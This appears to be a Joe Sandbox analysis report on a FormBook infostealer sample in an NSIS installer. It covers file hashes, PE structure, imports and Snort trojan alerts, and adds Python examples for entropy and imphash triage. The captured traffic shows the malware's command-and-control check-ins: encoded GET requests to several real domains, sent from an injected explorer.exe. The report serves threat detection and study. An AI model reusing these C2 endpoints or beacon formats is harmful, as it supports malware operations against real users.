                                                                                  Preview: ..H}.Y...H.j...j.0N...7..GW...{.-....I.._..r..a.Mh..H.a.#-~...<..5..-.......q.[..+q.....+}......SRB..a.i/<.\.2h@..r..._....1..d..cS..L..NP...!.s.3.X.xN.=....y..f.Jz.R..2.....?..b.iH........K.8QaDeX.k....p<.8........f#M.....h.H.....A.....if........5..V.B..o..5D...lgg.-..6......:.....A......DT..!....M.......H+x|v....N....P.:..F<..IA...(...}..-D).}.g......iR;|..Q..H..Ls.\$.Yy..Xn@.V.|cp.k....uA.5..`MW#i.7>.VD...P+K.8.zt.R....-...Y..yA.b.]....@.i7.".~.F.mQ......L."....|!.V...w.Z..c....ILg....%[z..:....?..V;.....C...m...$.e......P.(...../{..Z..u....Q...ag..rH...m0FJG9...S\........ ..J].'".dI'...o.%7%:...b.....p.+Q..L).C..I..hR.#...e.....A*.9....*58....~M.7..QI...32..ge...U.2o.....!.v.....1.B..G[..9.k.s42P..k...8.jf.&R.0.U...]r...}/u.^.Da.a.m..".......N.....0k.m.-q`..".c..."... ..o...,....c.`Y.]..L.-.....0..<o,..b..h&.iT.I.JM..... .Tt7:.<.......nT..9..d....g)q........*."..iA.....k........y.Hv.U...A.A")...1$G.(....[-VRZ.JN...I...8................{...
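The "Entropy (8bit)" and "Encrypted" fields above are derived from byte frequencies: a 186 KB drop scoring 7.999 bits per byte is indistinguishable from random data, which is what an encrypted or well-compressed payload looks like. The following is an added example, not code from the Joe Sandbox report, that reproduces the 8-bit Shannon entropy measure and then slides a window across a buffer to locate where such a payload starts inside a container file (an NSIS installer like this sample carries its compressed archive behind a small stub). The 7.9 "encrypted" and 7.0 "packed" cut-offs and the 1 KiB window are assumptions for triage, not the sandbox's own thresholds, and the input buffer is constructed.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())

# Triage thresholds (assumed, not the sandbox's own): the report marks the
# 7.999-entropy drop as Encrypted:true, so 7.9 is used as the "random" line.
ENCRYPTED_THRESHOLD = 7.9
PACKED_THRESHOLD = 7.0

def classify(entropy: float) -> str:
    """Coarse label for a whole file or section based on its entropy."""
    if entropy >= ENCRYPTED_THRESHOLD:
        return "encrypted/random"
    if entropy >= PACKED_THRESHOLD:
        return "compressed/packed"
    if entropy < 1.0:
        return "sparse/padding"
    return "plain code or data"

def high_entropy_regions(data: bytes, window: int = 1024, threshold: float = PACKED_THRESHOLD):
    """Return [(start, end)] byte ranges whose 'window'-sized chunks all exceed threshold.
    Adjacent hot windows are merged so an embedded blob comes out as one range."""
    regions = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if shannon_entropy(chunk) >= threshold:
            if regions and regions[-1][1] == off:
                regions[-1] = (regions[-1][0], off + len(chunk))
            else:
                regions.append((off, off + len(chunk)))
    return regions

# Constructed sample (not a real file): 4 KiB of zero padding, then 4 KiB that
# cycles through all 256 byte values (entropy exactly 8.0 per aligned window),
# then 1 KiB of repeated ASCII text.
SAMPLE = (
    bytes(4096)
    + bytes(range(256)) * 16
    + b"This program cannot be run in DOS mode. " * 25
    + b"\x00" * 24
)

if __name__ == "__main__":
    total = shannon_entropy(SAMPLE)
    print(f"whole buffer: {total:.3f} bits/byte -> {classify(total)}")
    for start, end in high_entropy_regions(SAMPLE):
        print(f"high-entropy payload candidate at 0x{start:x}-0x{end:x}")
```

Whole-file entropy alone is a blunt signal: the installer itself scores 7.92 because the compressed archive dominates its size, while the stub's .text section sits at 6.4. Running the windowed scan over the installer separates the two and gives the offset to carve from; once carved, the 7.999 result on the dropped blob says "decrypt it in the loader's context" rather than "unpack it statically".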

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):7.924378761315436
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:444890321.exe
                                                                                  File size:245867
                                                                                  MD5:f161fe51fee0cd2f542ea759241c88cb
                                                                                  SHA1:cd75d9c5a293151ad50dfa1d05edb5871fc08ad5
                                                                                  SHA256:d2d2d97ab2f2c78a230c58a61296504419d0b545c6c6d76193b654dfe9937499
                                                                                  SHA512:6481a88054e6a0eb989e92904606e890a8e8f04cd8ab016162fa753570ec3841215ac2f16d98cb0ba67cfaf3b7a56c0fcc66df45e46823116e374859d4fbcbb9
                                                                                  SSDEEP:6144:Ds9X42rPo+wjZXJIl/tDiOnQeahYOaqMn6YaFjYJ6VJAl:yv0+wjZXI/tDZnQeahYgMoacJAl
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\.........

                                                                                  File Icon

                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x40323c
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:099c0646ea7282d232219f8807883be0

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  sub esp, 00000180h
                                                                                  push ebx
                                                                                  push ebp
                                                                                  push esi
                                                                                  xor ebx, ebx
                                                                                  push edi
                                                                                  mov dword ptr [esp+18h], ebx
                                                                                  mov dword ptr [esp+10h], 00409130h
                                                                                  xor esi, esi
                                                                                  mov byte ptr [esp+14h], 00000020h
                                                                                  call dword ptr [00407030h]
                                                                                  push 00008001h
                                                                                  call dword ptr [004070B4h]
                                                                                  push ebx
                                                                                  call dword ptr [0040727Ch]
                                                                                  push 00000008h
                                                                                  mov dword ptr [00423F58h], eax
                                                                                  call 00007FD70C8EB8FEh
                                                                                  mov dword ptr [00423EA4h], eax
                                                                                  push ebx
                                                                                  lea eax, dword ptr [esp+34h]
                                                                                  push 00000160h
                                                                                  push eax
                                                                                  push ebx
                                                                                  push 0041F458h
                                                                                  call dword ptr [00407158h]
                                                                                  push 004091B8h
                                                                                  push 004236A0h
                                                                                  call 00007FD70C8EB5B1h
                                                                                  call dword ptr [004070B0h]
                                                                                  mov edi, 00429000h
                                                                                  push eax
                                                                                  push edi
                                                                                  call 00007FD70C8EB59Fh
                                                                                  push ebx
                                                                                  call dword ptr [0040710Ch]
                                                                                  cmp byte ptr [00429000h], 00000022h
                                                                                  mov dword ptr [00423EA0h], eax
                                                                                  mov eax, edi
                                                                                  jne 00007FD70C8E8CFCh
                                                                                  mov byte ptr [esp+14h], 00000022h
                                                                                  mov eax, 00429001h
                                                                                  push dword ptr [esp+14h]
                                                                                  push eax
                                                                                  call 00007FD70C8EB092h
                                                                                  push eax
                                                                                  call dword ptr [0040721Ch]
                                                                                  mov dword ptr [esp+1Ch], eax
                                                                                  jmp 00007FD70C8E8D55h
                                                                                  cmp cl, 00000020h
                                                                                  jne 00007FD70C8E8CF8h
                                                                                  inc eax
                                                                                  cmp byte ptr [eax], 00000020h
                                                                                  je 00007FD70C8E8CECh
                                                                                  cmp byte ptr [eax], 00000022h
                                                                                  mov byte ptr [eax+eax+00h], 00000000h

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                  Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x73a4           0xb4          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x2c000          0x9e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x28c         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                  Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
.text   0x1000           0x5a5a        0x5c00    False     0.660453464674   data       6.41769823686  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata  0x7000           0x1190        0x1200    False     0.4453125        data       5.18162709925  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x9000           0x1af98       0x400     False     0.55859375       data       4.70902740305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata  0x24000          0x8000        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x2c000          0x9e0         0xa00     False     0.45625          data       4.51012867721  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                  Resources

Name           RVA      Size   Type                                                                          Language  Country
RT_ICON        0x2c190  0x2e8  data                                                                          English   United States
RT_DIALOG      0x2c478  0x100  data                                                                          English   United States
RT_DIALOG      0x2c578  0x11c  data                                                                          English   United States
RT_DIALOG      0x2c698  0x60   data                                                                          English   United States
RT_GROUP_ICON  0x2c6f8  0x14   data                                                                          English   United States
RT_MANIFEST    0x2c710  0x2cc  XML 1.0 document, ASCII text, with very long lines, with no line terminators  English   United States

                                                                                  Imports

DLL: Imports
KERNEL32.dll: CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll: EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll: SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll: CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
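The "Import Hash" in the Static PE Info section (imphash) is the MD5 of the normalized import list in import-table order: each entry is `module.function` in lowercase with the `.dll`, `.ocx` or `.sys` extension dropped, and entries are joined with commas. The following added example (not the sandbox's code) recomputes that hash from a listing in the row format used by this report, accepting both the flattened `KERNEL32.dllCompareFileTime, ...` form and the `KERNEL32.dll: CompareFileTime, ...` form. It assumes the listing preserves raw import-table order, which is what the hash depends on, and it does not resolve ordinal-only imports, which need a per-DLL name lookup the listing does not provide. The abbreviated `LISTING` is constructed from the first few entries of three modules above.

```python
import hashlib
import re

# One row per DLL. In the flattened report the separator between the module name
# and its first function is lost, so the row is split right after the extension;
# an optional ':' after the extension is also accepted.
DLL_SPLIT = re.compile(r"^(?P<dll>\S+?\.(?:dll|ocx|sys))\s*:?\s*(?P<funcs>.*)$", re.IGNORECASE)

def parse_import_listing(lines):
    """Yield (dll, function) pairs, in listing order, from 'DLL: Import' rows."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        m = DLL_SPLIT.match(line)
        if not m:
            raise ValueError(f"unrecognized import row: {line!r}")
        dll = m.group("dll")
        for func in m.group("funcs").split(","):
            func = func.strip()
            if func:
                yield dll, func

def normalize_module(dll: str) -> str:
    """imphash lowercases the module and strips .dll/.ocx/.sys."""
    name = dll.lower()
    for ext in (".dll", ".ocx", ".sys"):
        if name.endswith(ext):
            return name[: -len(ext)]
    return name

def imphash_string(pairs) -> str:
    """The exact string that gets hashed: 'module.function' entries joined by commas."""
    return ",".join(f"{normalize_module(dll)}.{func.lower()}" for dll, func in pairs)

def imphash(pairs) -> str:
    """Lowercase hex MD5 of the normalized import string."""
    return hashlib.md5(imphash_string(pairs).encode("ascii")).hexdigest()

# Constructed, abbreviated listing: the first entries of three modules from the
# table above, in the report's flattened row format. Feed the full table to
# reproduce the report's Import Hash.
LISTING = [
    "KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA",
    "USER32.dllEndDialog, ScreenToClient",
    "ADVAPI32.dllRegQueryValueExA, RegSetValueExA",
]

if __name__ == "__main__":
    pairs = list(parse_import_listing(LISTING))
    print(imphash_string(pairs))
    print(imphash(pairs))
```

Every import in the table is part of the stock NSIS installer stub, so the hash identifies the packer, not the FormBook payload: it will match a large number of unrelated NSIS installers and is useful for pivoting only in combination with other features (section layout, the embedded plugin, the dropped blob's hash). If the recomputed value does not match the report's field, check the listing order against the raw import table and look for ordinal imports before trusting either number.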

                                                                                  Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

                                                                                  Network Behavior

                                                                                  Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP    Dest IP
06/11/21-12:17:03.163397  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.3  35.169.40.107
06/11/21-12:17:03.163397  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.3  35.169.40.107
06/11/21-12:17:03.163397  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49737        80         192.168.2.3  35.169.40.107

                                                                                  Network Port Distribution

                                                                                  TCP Packets

Timestamp                             Source Port  Dest Port  Source IP       Dest IP
Jun 11, 2021 12:16:23.536871910 CEST  49728        80         192.168.2.3     163.44.239.72
Jun 11, 2021 12:16:23.843411922 CEST  80           49728      163.44.239.72   192.168.2.3
Jun 11, 2021 12:16:23.843518019 CEST  49728        80         192.168.2.3     163.44.239.72
Jun 11, 2021 12:16:23.843692064 CEST  49728        80         192.168.2.3     163.44.239.72
Jun 11, 2021 12:16:24.149818897 CEST  80           49728      163.44.239.72   192.168.2.3
Jun 11, 2021 12:16:24.199903965 CEST  80           49728      163.44.239.72   192.168.2.3
Jun 11, 2021 12:16:24.199930906 CEST  80           49728      163.44.239.72   192.168.2.3
Jun 11, 2021 12:16:24.200057030 CEST  49728        80         192.168.2.3     163.44.239.72
Jun 11, 2021 12:16:24.200103045 CEST  49728        80         192.168.2.3     163.44.239.72
Jun 11, 2021 12:16:24.508001089 CEST  80           49728      163.44.239.72   192.168.2.3
Jun 11, 2021 12:16:42.529468060 CEST  49735        80         192.168.2.3     199.59.242.153
Jun 11, 2021 12:16:42.655133963 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.655319929 CEST  49735        80         192.168.2.3     199.59.242.153
Jun 11, 2021 12:16:42.655631065 CEST  49735        80         192.168.2.3     199.59.242.153
Jun 11, 2021 12:16:42.782591105 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.782979965 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.783025026 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.783066988 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.783102036 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.783154964 CEST  80           49735      199.59.242.153  192.168.2.3
Jun 11, 2021 12:16:42.783488035 CEST  49735        80         192.168.2.3     199.59.242.153
Jun 11, 2021 12:16:42.783581018 CEST  49735        80         192.168.2.3     199.59.242.153
Jun 11, 2021 12:17:03.026878119 CEST  49737        80         192.168.2.3     35.169.40.107
Jun 11, 2021 12:17:03.163161039 CEST  80           49737      35.169.40.107   192.168.2.3
Jun 11, 2021 12:17:03.163240910 CEST  49737        80         192.168.2.3     35.169.40.107
Jun 11, 2021 12:17:03.163397074 CEST  49737        80         192.168.2.3     35.169.40.107
Jun 11, 2021 12:17:03.298722029 CEST  80           49737      35.169.40.107   192.168.2.3
Jun 11, 2021 12:17:03.300910950 CEST  80           49737      35.169.40.107   192.168.2.3
Jun 11, 2021 12:17:03.300970078 CEST  80           49737      35.169.40.107   192.168.2.3
Jun 11, 2021 12:17:03.301126003 CEST  49737        80         192.168.2.3     35.169.40.107
Jun 11, 2021 12:17:03.301196098 CEST  49737        80         192.168.2.3     35.169.40.107
Jun 11, 2021 12:17:03.436517954 CEST  80           49737      35.169.40.107   192.168.2.3

                                                                                  UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Jun 11, 2021 12:15:04.338283062 CEST  51281        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:04.389538050 CEST  53           51281      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:05.260799885 CEST  49199        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:05.315190077 CEST  53           49199      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:06.089658976 CEST  50620        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:06.163535118 CEST  53           50620      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:06.169666052 CEST  64938        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:06.220799923 CEST  53           64938      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:07.288958073 CEST  60152        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:07.350446939 CEST  53           60152      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:08.466469049 CEST  57544        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:08.516527891 CEST  53           57544      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:09.876652956 CEST  55984        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:09.926764011 CEST  53           55984      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:10.876298904 CEST  64185        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:10.927905083 CEST  53           64185      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:11.947916985 CEST  65110        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:12.000762939 CEST  53           65110      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:13.128879070 CEST  58361        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:13.178880930 CEST  53           58361      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:14.212207079 CEST  63492        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:14.266834974 CEST  53           63492      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:15.463897943 CEST  60831        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:15.516990900 CEST  53           60831      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:18.343035936 CEST  60100        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:18.404768944 CEST  53           60100      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:19.278172970 CEST  53195        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:19.338288069 CEST  53           53195      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:20.235135078 CEST  50141        53         192.168.2.3  8.8.8.8
Jun 11, 2021 12:15:20.294764042 CEST  53           50141      8.8.8.8      192.168.2.3
Jun 11, 2021 12:15:21.261132956 CEST  53023        53         192.168.2.3  8.8.8.8
                                                                                  Jun 11, 2021 12:15:21.313108921 CEST53530238.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:22.343024015 CEST4956353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:22.393543959 CEST53495638.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:23.272404909 CEST5135253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:23.322529078 CEST53513528.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:24.404251099 CEST5934953192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:24.454335928 CEST53593498.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:26.621176958 CEST5708453192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:26.679791927 CEST53570848.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:41.593122005 CEST5882353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:41.657627106 CEST53588238.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:42.910631895 CEST5756853192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:42.977174044 CEST53575688.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:15:59.618515015 CEST5054053192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:15:59.681492090 CEST53505408.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:23.210164070 CEST5436653192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:23.531155109 CEST53543668.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:26.947351933 CEST5303453192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:27.024327040 CEST53530348.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:31.609294891 CEST5776253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:31.671394110 CEST53577628.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:16:42.383477926 CEST5543553192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:16:42.527309895 CEST53554358.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:17:02.240250111 CEST5071353192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:17:02.299516916 CEST53507138.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:17:02.963282108 CEST5613253192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:17:03.025981903 CEST53561328.8.8.8192.168.2.3
                                                                                  Jun 11, 2021 12:17:03.959834099 CEST5898753192.168.2.38.8.8.8
                                                                                  Jun 11, 2021 12:17:04.012559891 CEST53589878.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 12:16:23.210164070 CEST | 192.168.2.3 | 8.8.8.8 | 0xdea6 | Standard query (0) | www.mekarauroko7389.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:16:42.383477926 CEST | 192.168.2.3 | 8.8.8.8 | 0x7059 | Standard query (0) | www.oklahomasundayschool.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:17:02.963282108 CEST | 192.168.2.3 | 8.8.8.8 | 0x487e | Standard query (0) | www.shamushalkowich.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 12:16:23.531155109 CEST | 8.8.8.8 | 192.168.2.3 | 0xdea6 | No error (0) | www.mekarauroko7389.com | mekarauroko7389.com | - | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:16:23.531155109 CEST | 8.8.8.8 | 192.168.2.3 | 0xdea6 | No error (0) | mekarauroko7389.com | - | 163.44.239.72 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:16:42.527309895 CEST | 8.8.8.8 | 192.168.2.3 | 0x7059 | No error (0) | www.oklahomasundayschool.com | - | 199.59.242.153 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:17:03.025981903 CEST | 8.8.8.8 | 192.168.2.3 | 0x487e | No error (0) | www.shamushalkowich.com | - | 35.169.40.107 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:17:03.025981903 CEST | 8.8.8.8 | 192.168.2.3 | 0x487e | No error (0) | www.shamushalkowich.com | - | 34.225.31.148 | A (IP address) | IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.mekarauroko7389.com
                                                                                  • www.oklahomasundayschool.com
                                                                                  • www.shamushalkowich.com

                                                                                  HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49728 | 163.44.239.72 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:16:23.843692064 CEST | 1312 | OUT | GET /ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp HTTP/1.1
Host: www.mekarauroko7389.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:16:24.199903965 CEST | 1312 | IN | HTTP/1.1 301 Moved Permanently
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                  X-Redirect-By: WordPress
                                                                                  Location: http://mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp
                                                                                  Content-Length: 0
                                                                                  Date: Fri, 11 Jun 2021 10:16:24 GMT
                                                                                  Server: LiteSpeed


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49735 | 199.59.242.153 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:16:42.655631065 CEST | 4356 | OUT | GET /ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp HTTP/1.1
Host: www.oklahomasundayschool.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:16:42.782979965 CEST | 4357 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Fri, 11 Jun 2021 10:16:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
